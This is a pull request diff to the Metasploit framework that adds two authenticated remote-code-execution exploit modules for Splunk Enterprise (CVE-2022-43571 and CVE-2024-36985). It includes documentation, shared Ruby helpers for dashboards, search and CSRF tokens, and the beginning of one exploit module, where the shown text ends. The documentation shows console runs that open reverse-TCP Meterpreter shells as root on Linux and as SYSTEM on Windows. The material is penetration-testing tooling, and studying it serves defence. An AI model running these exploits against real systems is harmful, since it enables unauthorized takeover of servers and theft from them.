### PR TITLE
Add Splunk RCE Exploits (CVE-2022-43571 & CVE-2024-36985)

### DIFF
--- a/documentation/modules/exploit/linux/http/splunk_auth_rce_cve_2024_36985.md
+++ b/documentation/modules/exploit/linux/http/splunk_auth_rce_cve_2024_36985.md
@@ -1,0 +1,56 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise (splunk_archiver application).
+
+The flaw is rooted in the unsafe use of a Splunk lookup function, specifically `| copybuckets`, within the splunk_archiver application, which ultimately leads to the execution of the helper script sudobash with attacker-controlled arguments.
+
+The affected versions include any release prior to 9.0.10, as well as versions 9.1.2 through 9.1.5 and 9.2.0 through 9.2.2.
+
+## Testing
+
+1. Download Splunk
+```
+wget -O splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb 'https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb'
+```
+
+2. Install
+```
+sudo dpkg -i splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb
+```
+
+3. Execute
+```
+/opt/splunk/bin/splunk start
+```
+
+## Scenario
+
+```
+msf6 > use linux/http/splunk_auth_rce_cve_2024_36985
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RHOSTS 192.168.19.139
+RHOSTS => 192.168.19.139
+msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RPORT 8000
+RPORT => 8000
+msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set FETCH_SRVPORT 8090
+FETCH_SRVPORT => 8090
+msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set PASSWORD password123
+PASSWORD => password123
+msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
+[+] The target appears to be vulnerable. Exploitable version found: 8.2.4, splunk_archiver app is enabled
+[*] Sending stage (3045380 bytes) to 192.168.19.139
+[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.139:55936) at 2025-12-12 15:04:44 -0500
+
+meterpreter > sysinfo
+Computer     : 192.168.19.139
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```

--- a/documentation/modules/exploit/linux/http/splunk_auth_rce_cve_2024_36985.md
+++ b/documentation/modules/exploit/linux/http/splunk_auth_rce_cve_2024_36985.md
@@ -8,6 +8,21 @@ The affected versions include any release prior to 9.0.10, as well as versions 9
 
 ## Testing
 
+### Docker
+
+```
+docker run \
+  --name splunk \
+  -p 8000:8000 \
+  -p 8088:8088 \
+  -p 9997:9997 \
+  -e "SPLUNK_START_ARGS=--accept-license" \
+  -e "SPLUNK_PASSWORD=password123" \
+  splunk/splunk:8.2.4
+```
+
+### Manual
+
 1. Download Splunk
 ```
 wget -O splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb 'https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb'

--- a/documentation/modules/exploit/multi/http/splunk_auth_rce_cve_2022_43571.md
+++ b/documentation/modules/exploit/multi/http/splunk_auth_rce_cve_2022_43571.md
@@ -11,6 +11,21 @@ The affected versions include any release prior to 8.1.12, as well as versions 8
 
 ### Linux
 
+#### Docker
+
+```
+docker run \
+  --name splunk \
+  -p 8000:8000 \
+  -p 8088:8088 \
+  -p 9997:9997 \
+  -e "SPLUNK_START_ARGS=--accept-license" \
+  -e "SPLUNK_PASSWORD=password123" \
+  splunk/splunk:8.2.4
+```
+
+#### Manual
+
 1. Download Splunk
 ```
 wget -O splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb 'https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb'
@@ -35,10 +50,10 @@ wget -O splunk-8.2.6-a6fe1ee8894b-x64-release.msi "https://download.splunk.com/p
 
 2. Install
 
-3. Run
+3. Execute
 
 ```
-C:\Program Files\Splunk\bin\splunk.exe start
+"C:\Program Files\Splunk\bin\splunk.exe" start
 ```
 
 ## Scenario

--- a/documentation/modules/exploit/multi/http/splunk_auth_rce_cve_2022_43571.md
+++ b/documentation/modules/exploit/multi/http/splunk_auth_rce_cve_2022_43571.md
@@ -1,0 +1,104 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
+
+An attacker can inject arbitrary Python code into style parameters, such as the `fillColor` or `lineColor` of a sparkline element within a Splunk SimpleXML dashboard.
+The malicious code is executed when a user triggers the PDF export function for the dashboard.
+
+The affected versions include any release prior to 8.1.12, as well as versions 8.2.0 through 8.2.9 and 9.0.0 through 9.0.2.
+
+## Testing
+
+### Linux
+
+1. Download Splunk
+```
+wget -O splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb 'https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb'
+```
+
+2. Install
+```
+sudo dpkg -i splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb
+```
+
+3. Execute
+```
+/opt/splunk/bin/splunk start
+```
+
+### Windows
+
+1. Download Splunk
+```
+wget -O splunk-8.2.6-a6fe1ee8894b-x64-release.msi "https://download.splunk.com/products/splunk/releases/8.2.6/windows/splunk-8.2.6-a6fe1ee8894b-x64-release.msi"
+```
+
+2. Install
+
+3. Run
+
+```
+C:\Program Files\Splunk\bin\splunk.exe start
+```
+
+## Scenario
+
+### Linux
+
+```
+msf6 > use multi/http/splunk_auth_rce_cve_2022
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.139
+RHOSTS => 192.168.19.139
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
+RPORT => 8000
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
+PASSWORD => password123
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
+[+] The target appears to be vulnerable. Exploitable version found: 8.2.4
+[*] Sending stage (24772 bytes) to 192.168.19.139
+[*] Meterpreter session 2 opened (192.168.19.130:4444 -> 192.168.19.139:59524) at 2025-12-12 15:11:44 -0500
+
+meterpreter > sysinfo
+Computer        : ubuntu
+OS              : Linux 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: root
+```
+
+### Windows
+
+```
+msf6 > use multi/http/splunk_auth_rce_cve_2022_43571
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.137
+RHOSTS => 192.168.19.137
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
+RPORT => 8000
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
+PASSWORD => password123
+msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
+[+] The target appears to be vulnerable. Exploitable version found: 8.2.6
+[*] Sending stage (24772 bytes) to 192.168.19.137
+[*] Meterpreter session 3 opened (192.168.19.130:4444 -> 192.168.19.137:62128) at 2025-12-12 15:21:53 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-vognik
+OS              : Windows 10 (Build 19044)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

--- a/lib/msf/core/exploit/remote/http/splunk.rb
+++ b/lib/msf/core/exploit/remote/http/splunk.rb
@@ -13,6 +13,8 @@ module Msf
           include Msf::Exploit::Remote::HTTP::Splunk::Login
           include Msf::Exploit::Remote::HTTP::Splunk::URIs
           include Msf::Exploit::Remote::HTTP::Splunk::Version
+          include Msf::Exploit::Remote::HTTP::Splunk::Dashboards
+          include Msf::Exploit::Remote::HTTP::Splunk::Search
 
           def initialize(info = {})
             super

--- a/lib/msf/core/exploit/remote/http/splunk/apps.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/apps.rb
@@ -53,27 +53,41 @@ module Msf::Exploit::Remote::HTTP::Splunk::Apps
   # @param cookie [String] Valid admin's cookie
   # @return [Hash] A hash where keys are app names and values are hashes with app status
   def get_apps(cookie)
-    res = send_request_cgi(
-      'uri' => splunk_apps_url,
-      'method' => 'GET',
-      'cookie' => cookie
-    )
-    unless res&.code == 200
-      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    apps = {}
+    vars_get = {}
+
+    loop do
+      res = send_request_cgi(
+        'uri' => splunk_apps_url,
+        'method' => 'GET',
+        'cookie' => cookie,
+        'vars_get' => vars_get
+      )
+
+      unless res&.code == 200
+        fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} - Failed to retrieve apps (HTTP #{res&.code})")
+      end
+
+      html = res.get_html_document
+      table = html.at('table.splTable')
+      break unless table
+
+      table.css('tr').each do |row|
+        name_td = row.at('td.col-generic.col-2')
+        status_td = row.at('td.col-status.col-7')
+
+        next unless name_td && status_td
+
+        name = name_td.text.strip
+        status = status_td.text.strip.split.first
+        apps[name] = { status: status }
+      end
+
+      vars_get = extract_next_page_vars(html)
+      break unless vars_get
     end
 
-    html = res.get_html_document
-
-    table = html.at('table.splTable')
-    app_names_col_values = table.css('td.col-generic.col-2')
-    app_states_col_values = table.css('td.col-status.col-7')
-
-    app_names = app_names_col_values.map { |td| td.text.strip }
-    app_states = app_states_col_values.map { |td| td.text.strip.split.first }
-
-    app_names.zip(app_states).to_h do |name, status|
-      [name, { status: status }]
-    end
+    apps
   end
 
   # Selects a random Splunk app from the installed apps, optionally filtered by criteria

--- a/lib/msf/core/exploit/remote/http/splunk/apps.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/apps.rb
@@ -83,8 +83,8 @@ module Msf::Exploit::Remote::HTTP::Splunk::Apps
   # @return [String, nil] The name of a random app matching the filter, or nil if none found
   def get_random_app(cookie, filter = {})
     all_apps = get_apps(cookie)
-    enabled_apps = filter_apps(all_apps, filter).keys
+    filtered_apps = filter_apps(all_apps, filter).keys
 
-    enabled_apps.sample
+    filtered_apps.sample
   end
 end

--- a/lib/msf/core/exploit/remote/http/splunk/apps.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/apps.rb
@@ -54,7 +54,7 @@ module Msf::Exploit::Remote::HTTP::Splunk::Apps
   # @return [Hash] A hash where keys are app names and values are hashes with app status
   def get_apps(cookie)
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/en-US/manager/search/apps/local'),
+      'uri' => splunk_apps_url,
       'method' => 'GET',
       'cookie' => cookie
     )

--- a/lib/msf/core/exploit/remote/http/splunk/apps.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/apps.rb
@@ -47,4 +47,44 @@ module Msf::Exploit::Remote::HTTP::Splunk::Apps
 
     true
   end
+
+  # Retrieves a list of installed Splunk apps along with their status
+  #
+  # @param cookie [String] Valid admin's cookie
+  # @return [Hash] A hash where keys are app names and values are hashes with app status
+  def get_apps(cookie)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/en-US/manager/search/apps/local'),
+      'method' => 'GET',
+      'cookie' => cookie
+    )
+    unless res&.code == 200
+      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    html = res.get_html_document
+
+    table = html.at('table.splTable')
+    app_names_col_values = table.css('td.col-generic.col-2')
+    app_states_col_values = table.css('td.col-status.col-7')
+
+    app_names = app_names_col_values.map { |td| td.text.strip }
+    app_states = app_states_col_values.map { |td| td.text.strip.split.first }
+
+    app_names.zip(app_states).to_h do |name, status|
+      [name, { status: status }]
+    end
+  end
+
+  # Selects a random Splunk app from the installed apps, optionally filtered by criteria
+  #
+  # @param cookie [String] Valid admin's cookie
+  # @param filter [Hash] Optional filter criteria (e.g., status: 'enabled')
+  # @return [String, nil] The name of a random app matching the filter, or nil if none found
+  def get_random_app(cookie, filter = {})
+    all_apps = get_apps(cookie)
+    enabled_apps = filter_apps(all_apps, filter).keys
+
+    enabled_apps.sample
+  end
 end

--- a/lib/msf/core/exploit/remote/http/splunk/apps.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/apps.rb
@@ -56,7 +56,8 @@ module Msf::Exploit::Remote::HTTP::Splunk::Apps
     apps = {}
     vars_get = {}
 
-    loop do
+    max_pages = 250
+    max_pages.times do |page_num|
       res = send_request_cgi(
         'uri' => splunk_apps_url,
         'method' => 'GET',
@@ -78,13 +79,20 @@ module Msf::Exploit::Remote::HTTP::Splunk::Apps
 
         next unless name_td && status_td
 
+        status_link = status_td.at('a[onclick*="doObjectAction"]')
+        action_type = status_link&.[]('onclick')&.slice(/doObjectAction\('(disable|enable)'/, 1)
+        enabled = action_type != 'enable'
+
         name = name_td.text.strip
-        status = status_td.text.strip.split.first
-        apps[name] = { status: status }
+        apps[name] = { enabled: enabled }
       end
 
       vars_get = extract_next_page_vars(html)
       break unless vars_get
+
+      if page_num == max_pages - 1
+        print_warning("Reached maximum page limit (#{max_pages}). Some apps might be missing.")
+      end
     end
 
     apps

--- a/lib/msf/core/exploit/remote/http/splunk/dashboards.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/dashboards.rb
@@ -1,0 +1,93 @@
+# -*- coding: binary -*-
+
+# This module provides a way of interacting with Splunk dashboards
+module Msf::Exploit::Remote::HTTP::Splunk::Dashboards
+  # Creates a new Splunk dashboard in the specified namespace
+  #
+  # @param namespace [String] The Splunk namespace (usually a user or app) where the dashboard will be created
+  # @param name [String] The name of the dashboard
+  # @param template [String] The dashboard template content
+  # @param cookie [String] Valid admin's cookie
+  # @return [Rex::Proto::Http::Response] HTTP response object
+  def create_dashboard(namespace, name, template, cookie)
+    get_malicious_dashboard_template(template)
+    csrf = extract_csrf_token(cookie)
+
+    res = send_request_cgi(
+      'uri' => splunk_dashboard_create_api_url(namespace),
+      'method' => 'POST',
+      'vars_get' => {
+        'output_mode' => 'json'
+      },
+      'vars_post' => {
+        'name' => name,
+        'eai:data' => template,
+        'eai:type' => 'views'
+      },
+      'cookie' => cookie,
+      'headers' => {
+        'X-Splunk-Form-Key' => csrf,
+        'X-Requested-With': 'XMLHttpRequest'
+      }
+    )
+    unless res&.code == 201
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    res
+  end
+
+  # Exports a Splunk dashboard to PDF
+  #
+  # @param namespace [String] The Splunk namespace where the dashboard resides
+  # @param name [String] The name of the dashboard to export
+  # @param cookie [String] Valid admin's cookie
+  # @return [Rex::Proto::Http::Response] HTTP response object containing the exported PDF
+  def export_dashboard(namespace, name, cookie)
+    csrf = extract_csrf_token(cookie)
+
+    res = send_request_cgi(
+      'uri' => splunk_dashboard_pdf_export_api_url(namespace, name),
+      'method' => 'POST',
+      'vars_post' => {
+        'input-dashboard' => name,
+        'namespace' => namespace,
+        'splunk_form_key' => csrf
+      },
+      'cookie' => cookie
+    )
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    res
+  end
+
+  # Deletes a Splunk dashboard from the specified namespace
+  #
+  # @param namespace [String] The Splunk namespace where the dashboard resides
+  # @param name [String] The name of the dashboard to delete
+  # @param cookie [String] Valid admin's cookie
+  # @return [Rex::Proto::Http::Response] HTTP response object
+  def delete_dashboard(namespace, name, cookie)
+    csrf = extract_csrf_token(cookie)
+
+    res = send_request_cgi(
+      'uri' => splunk_dashboard_delete_api_url(namespace, name),
+      'method' => 'DELETE',
+      'vars_get' => {
+        'output_mode' => 'json'
+      },
+      'cookie' => @cookie,
+      'headers' => {
+        'X-Requested-With': 'XMLHttpRequest',
+        'X-Splunk-Form-Key' => csrf
+      }
+    )
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    res
+  end
+end

--- a/lib/msf/core/exploit/remote/http/splunk/dashboards.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/dashboards.rb
@@ -30,7 +30,7 @@ module Msf::Exploit::Remote::HTTP::Splunk::Dashboards
       }
     )
     unless res&.code == 201
-      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
     end
 
     res
@@ -56,7 +56,7 @@ module Msf::Exploit::Remote::HTTP::Splunk::Dashboards
       'cookie' => cookie
     )
     unless res&.code == 200
-      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
     end
 
     res
@@ -84,7 +84,7 @@ module Msf::Exploit::Remote::HTTP::Splunk::Dashboards
       }
     )
     unless res&.code == 200
-      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
     end
 
     res

--- a/lib/msf/core/exploit/remote/http/splunk/dashboards.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/dashboards.rb
@@ -10,7 +10,6 @@ module Msf::Exploit::Remote::HTTP::Splunk::Dashboards
   # @param cookie [String] Valid admin's cookie
   # @return [Rex::Proto::Http::Response] HTTP response object
   def create_dashboard(namespace, name, template, cookie)
-    get_malicious_dashboard_template(template)
     csrf = extract_csrf_token(cookie)
 
     res = send_request_cgi(

--- a/lib/msf/core/exploit/remote/http/splunk/helpers.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/helpers.rb
@@ -126,7 +126,11 @@ module Msf::Exploit::Remote::HTTP::Splunk::Helpers
     return nil if cookie.nil? || cookie.empty?
 
     cookies = cookies_hash(cookie)
-    cookies["splunkweb_csrf_token_#{datastore['RPORT']}"]
+    target_key = cookies.keys.find do |key|
+      key =~ /^splunkweb_csrf_token_(\d+)$/
+    end
+
+    cookies[target_key] if target_key
   end
 
   # Extracts pagination parameters from the 'Next' link in the Splunk table.

--- a/lib/msf/core/exploit/remote/http/splunk/helpers.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/helpers.rb
@@ -91,4 +91,41 @@ module Msf::Exploit::Remote::HTTP::Splunk::Helpers
 
     Rex::Text.gzip(tarfile.string)
   end
+
+  # Filters a hash of Splunk apps based on provided attributes
+  #
+  # @param apps [Hash] A hash of apps where keys are app names and values are attribute hashes
+  # @param filter [Hash] A hash of attributes to filter by (e.g., { status: 'enabled' })
+  # @return [Hash] A hash of apps that match all filter criteria
+  def filter_apps(apps, filter = {})
+    apps.select do |_name, attributes|
+      filter.all? { |key, value| attributes[key] == value }
+    end
+  end
+
+  # Converts a cookie string into a hash
+  #
+  # @param cookie [String] Cookie string in the format "key1=value1; key2=value2"
+  # @return [Hash] Hash mapping cookie names to their values
+  def cookies_hash(cookie)
+    return {} if cookie.nil? || cookie.empty?
+
+    cookie.split(';').each_with_object({}) do |pair, hash|
+      key, value = pair.split('=', 2)
+      next if key.nil? || value.nil?
+
+      hash[key.strip] = value.strip
+    end
+  end
+
+  # Extracts the Splunk CSRF token from a cookie string
+  #
+  # @param cookie [String] Cookie string containing the CSRF token
+  # @return [String, nil] The CSRF token for the current Splunk port, or nil if not found
+  def extract_csrf_token(cookie)
+    return nil if cookie.nil? || cookie.empty?
+
+    cookies = cookies_hash(cookie)
+    cookies["splunkweb_csrf_token_#{datastore['RPORT']}"]
+  end
 end

--- a/lib/msf/core/exploit/remote/http/splunk/helpers.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/helpers.rb
@@ -128,4 +128,20 @@ module Msf::Exploit::Remote::HTTP::Splunk::Helpers
     cookies = cookies_hash(cookie)
     cookies["splunkweb_csrf_token_#{datastore['RPORT']}"]
   end
+
+  # Extracts pagination parameters from the 'Next' link in the Splunk table.
+  #
+  # @param html [Nokogiri::HTML::Document] The HTML document to parse.
+  # @return [Hash, nil] Returns a hash of GET parameters if a next page exists, otherwise nil.
+  def extract_next_page_vars(html)
+    next_link = html.at('li.next a')
+    return nil unless next_link&.[]('href')
+
+    begin
+      query = URI.parse(next_link['href']).query
+      query ? Rack::Utils.parse_query(query) : nil
+    rescue URI::InvalidURIError
+      nil
+    end
+  end
 end

--- a/lib/msf/core/exploit/remote/http/splunk/login.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/login.rb
@@ -12,7 +12,7 @@ module Msf::Exploit::Remote::HTTP::Splunk::Login
     # gets cval cookies
     cookie = splunk_helper_extract_token(timeout)
     if cookie.nil?
-      vprint_error('Unable to extract login tokens')
+      print_error('Unable to extract login tokens')
       return nil
     end
 
@@ -31,12 +31,12 @@ module Msf::Exploit::Remote::HTTP::Splunk::Login
     }, timeout)
 
     unless res
-      vprint_error("FAILED LOGIN. '#{username}' : '#{password}' returned no response")
+      print_error("FAILED LOGIN. '#{username}' : '#{password}' returned no response")
       return nil
     end
 
     unless res.code == 303 || (res.code == 200 && res.body.to_s.index('{"status":0}'))
-      vprint_error("FAILED LOGIN. '#{username}' : '#{password}' with code #{res.code}")
+      print_error("FAILED LOGIN. '#{username}' : '#{password}' with code #{res.code}")
       return nil
     end
 

--- a/lib/msf/core/exploit/remote/http/splunk/search.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/search.rb
@@ -25,7 +25,7 @@ module Msf::Exploit::Remote::HTTP::Splunk::Search
     )
 
     unless res&.code == 201
-      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 201")
+      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 201")
     end
 
     res

--- a/lib/msf/core/exploit/remote/http/splunk/search.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/search.rb
@@ -1,0 +1,33 @@
+# -*- coding: binary -*-
+
+# This module provides a way of interacting with Splunk search
+module Msf::Exploit::Remote::HTTP::Splunk::Search
+  # Executes a Splunk search in the specified namespace
+  #
+  # @param namespace [String] The Splunk namespace (user or app context) for the search
+  # @param query [String] The search query to execute
+  # @param cookie [String] Valid admin's cookie
+  # @return [Rex::Proto::Http::Response] HTTP response object containing the search results
+  def search(namespace, query, cookie)
+    csrf = extract_csrf_token(cookie)
+
+    res = send_request_cgi(
+      'uri' => splunk_search_api_url(namespace),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'headers' => {
+        'X-Splunk-Form-Key' => csrf,
+        'X-Requested-With': 'XMLHttpRequest'
+      },
+      'vars_post' => {
+        search: query
+      }
+    )
+
+    unless res&.code == 201
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 201")
+    end
+
+    res
+  end
+end

--- a/lib/msf/core/exploit/remote/http/splunk/uris.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/uris.rb
@@ -32,6 +32,13 @@ module Msf::Exploit::Remote::HTTP::Splunk::URIs
     normalize_uri(target_uri.path, 'en-US', 'manager', 'appinstall', '_upload')
   end
 
+  # Returns the URL for the Splunk local apps management page
+  #
+  # @return [String] Splunk local apps management page URL
+  def splunk_apps_url
+    normalize_uri(target_uri.path, 'en-US', 'manager', 'search', 'apps', 'local')
+  end
+
   # Returns the URL for splunk search api
   #
   # @param namespace [String] Splunk app context for execution

--- a/lib/msf/core/exploit/remote/http/splunk/uris.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/uris.rb
@@ -31,4 +31,38 @@ module Msf::Exploit::Remote::HTTP::Splunk::URIs
   def splunk_upload_url
     normalize_uri(target_uri.path, 'en-US', 'manager', 'appinstall', '_upload')
   end
+
+  # Returns the URL for splunk search api
+  #
+  # @param namespace [String] Splunk app context for execution
+  # @return [String] Splunk search api URL
+  def splunk_search_api_url(namespace = 'search')
+    normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', 'admin', namespace, 'search', 'jobs')
+  end
+
+  # Returns the Splunk API URL for creating or managing dashboards in the specified namespace
+  #
+  # @param namespace [String] Splunk app or user context for execution
+  # @return [String] Full URL for the dashboards API endpoint
+  def splunk_dashboard_create_api_url(namespace)
+    normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', 'admin', namespace, 'data', 'ui', 'views')
+  end
+
+  # Returns the Splunk API URL used for exporting a dashboard to PDF
+  #
+  # @param namespace [String] Splunk app or user context for execution
+  # @param name [String] The name of the dashboard to export
+  # @return [String] Full URL for the PDF export API endpoint
+  def splunk_dashboard_pdf_export_api_url(namespace, name)
+    normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'services', 'pdfgen', 'render')
+  end
+
+  # Returns the Splunk API URL for deleting a dashboard in the specified namespace
+  #
+  # @param namespace [String] Splunk app or user context for execution
+  # @param name [String] The name of the dashboard to delete
+  # @return [String] Full URL for the dashboard deletion API endpoint
+  def splunk_dashboard_delete_api_url(namespace, name)
+    normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', 'admin', namespace, 'data', 'ui', 'views', name)
+  end
 end

--- a/lib/msf/core/exploit/remote/http/splunk/version.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/version.rb
@@ -53,4 +53,39 @@ module Msf::Exploit::Remote::HTTP::Splunk::Version
       return match[0].split[1] if match
     end
   end
+
+  # Tries to extract splunk verion from home page
+  #
+  # @param cookie_string [String] Valid cookie
+  # @return [Rex::Version, nil] Splunk version if found, otherwise nil
+  def splunk_home_version(cookie_string = nil)
+    res = send_request_cgi(
+      'uri' => splunk_home,
+      'method' => 'GET',
+      'cookie' => cookie_string
+    )
+    unless res&.code == 200
+      fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    script_tag = res.get_html_document.at('script:contains("__splunkd_partials__")')
+    return nil unless script_tag
+
+    script_text = script_tag.text
+    return nil unless script_text
+
+    # search json string like {}
+    json_str = script_text[/\{.*\}/m]
+    return nil unless json_str
+
+    begin
+      splunkd_partials = JSON.parse(json_str)
+    rescue JSON::ParserError
+      return nil
+    end
+
+    version = splunkd_partials.dig('/services/server/info', 'entry', 0, 'content', 'version')
+
+    Rex::Version.new(version)
+  end
 end

--- a/lib/msf/core/exploit/remote/http/splunk/version.rb
+++ b/lib/msf/core/exploit/remote/http/splunk/version.rb
@@ -85,6 +85,7 @@ module Msf::Exploit::Remote::HTTP::Splunk::Version
     end
 
     version = splunkd_partials.dig('/services/server/info', 'entry', 0, 'content', 'version')
+    return nil unless version
 
     Rex::Version.new(version)
   end

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -63,7 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'Path to the Splunk App', '/']),
         OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
         OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
-        OptString.new('SPLUNK_HOME', [true, 'Path to the Splunk Home Directory', '/opt/splunk/']),
+        OptString.new('SPLUNK_HOME', [true, 'Path to the Splunk home directory', '/opt/splunk/']),
+        OptString.new('CREATE_SUDOBASH', [true, 'Set to false if you are sure that sudobash exists on the target system', true]),
       ]
     )
   end
@@ -127,7 +128,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @target_app = get_random_app(@cookie, status: 'Enabled')
 
-    create_sudobash
+    if datastore['CREATE_SUDOBASH'] == true
+      create_sudobash
+    end
+
     trigger_exploit
   end
 

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Splunk
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Authenticated RCE in Splunk (splunk_archiver app)',
+        'Description' => %q{
+          This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise (splunk_archiver application).
+
+          The flaw is rooted in the unsafe use of a Splunk lookup function, specifically | copybuckets, within the splunk_archiver application,
+          which ultimately leads to the execution of the helper script sudobash with attacker-controlled arguments.
+
+          The affected versions include any release prior to 9.0.10, as well as versions 9.1.2 through 9.1.5 and 9.2.0 through 9.2.2.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'psytester', # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', 'CVE-2024-36985'],
